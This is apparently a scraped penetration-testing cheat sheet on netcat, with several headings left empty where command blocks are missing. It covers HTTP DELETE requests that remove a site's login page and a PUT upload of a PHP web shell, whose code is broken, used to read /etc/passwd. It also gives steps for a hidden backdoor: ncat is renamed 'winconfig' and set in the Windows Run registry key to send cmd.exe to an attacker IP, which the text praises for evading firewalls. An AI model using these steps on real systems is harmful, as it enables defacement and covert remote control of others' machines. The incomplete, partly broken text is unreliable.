netcat
Installation
Preinstalled in kali. Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP.
For windows: https://nmap.org/ncat/.
For linux:
Usage
It’s used for HTTP
Fingerprinting with netcat
Also, Nmap does not always recognize all information by default. Sometimes you can use netcat to interpelate a service:
Netcat commands
As a server
nc -lvp 8888
#-p: specify a port
#-l: to listening
#-v: verbosity
#-u: enforces udp connection
#-e: executes the given command
As a client
Transfer data
On the server side:
On the client side:
Transfer data and save it in a file
On the server side:
On the client side:
Transfer file and save it
On the server side:
On the client side:
Netcat shell
On the server side:
On the client side:
Some enumeration techniques for HTTP verbs
Some exploitation techniques for HTTP verbs
DELETE attack
# General syntax for removing a resource from server using netcat
nc victim.site 80
DELETE /path/to/resource.txt HTTP/1.0
# Example for removing the login page of a site
nc victim.site 80
DELETE /login.php HTTP/1.0
PUT attack: getting a shell
# Save for instance a php basic shell in a file (shell.php):
<?php
if (isset($_GET[‘cmd’]))
{
$cmd = $_GET[‘cmd’];
echo ‘<pre>’;
$result = shell_exec($cmd);
echo $result;
echo ‘</pre>’;
?>
# Count the size of the file
wc -m shell.php
# Send with netcat the HTTP verb message
nc victim.site 80
PUT /shell.php HTTP/1.0
Conten-type: text/html
Content-length: [number you got with wc -m payload]
# Run the exploit by typing in the browser:
http://victim.site/shell.php?cmd=cat+/etc/passwd
Backdoors with netcat
The attacker initiates the connection
In the victim machine: If windows, get the ncat.exe executable file, rename it to something else such as winconfig and we write in command line:
In the attacker machine:
The victim initiates the connection
Great to avoid firewalls!!!
In the victim machine: If windows, get the ncat.exe executable file, rename it to something else such as winconfig and we write in command line:
In the attacker machine:Creating a registry in regedit
- In regedit, go to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Right-Button > New > String value
- We name it exactly like the ncat.exe file (if we renamed it to winconfig, then we call this registry winconfig>
- We edit the registry and we add the path to the executable file and some commands in the Value data:
“C:\Windows/System32\winconfig.exe <attacker IP> <port> -e cmd.exe”
# For instance: “C:\Windows/System32\winconfig.exe 192.168.1.50 5540 -e cmd.exe”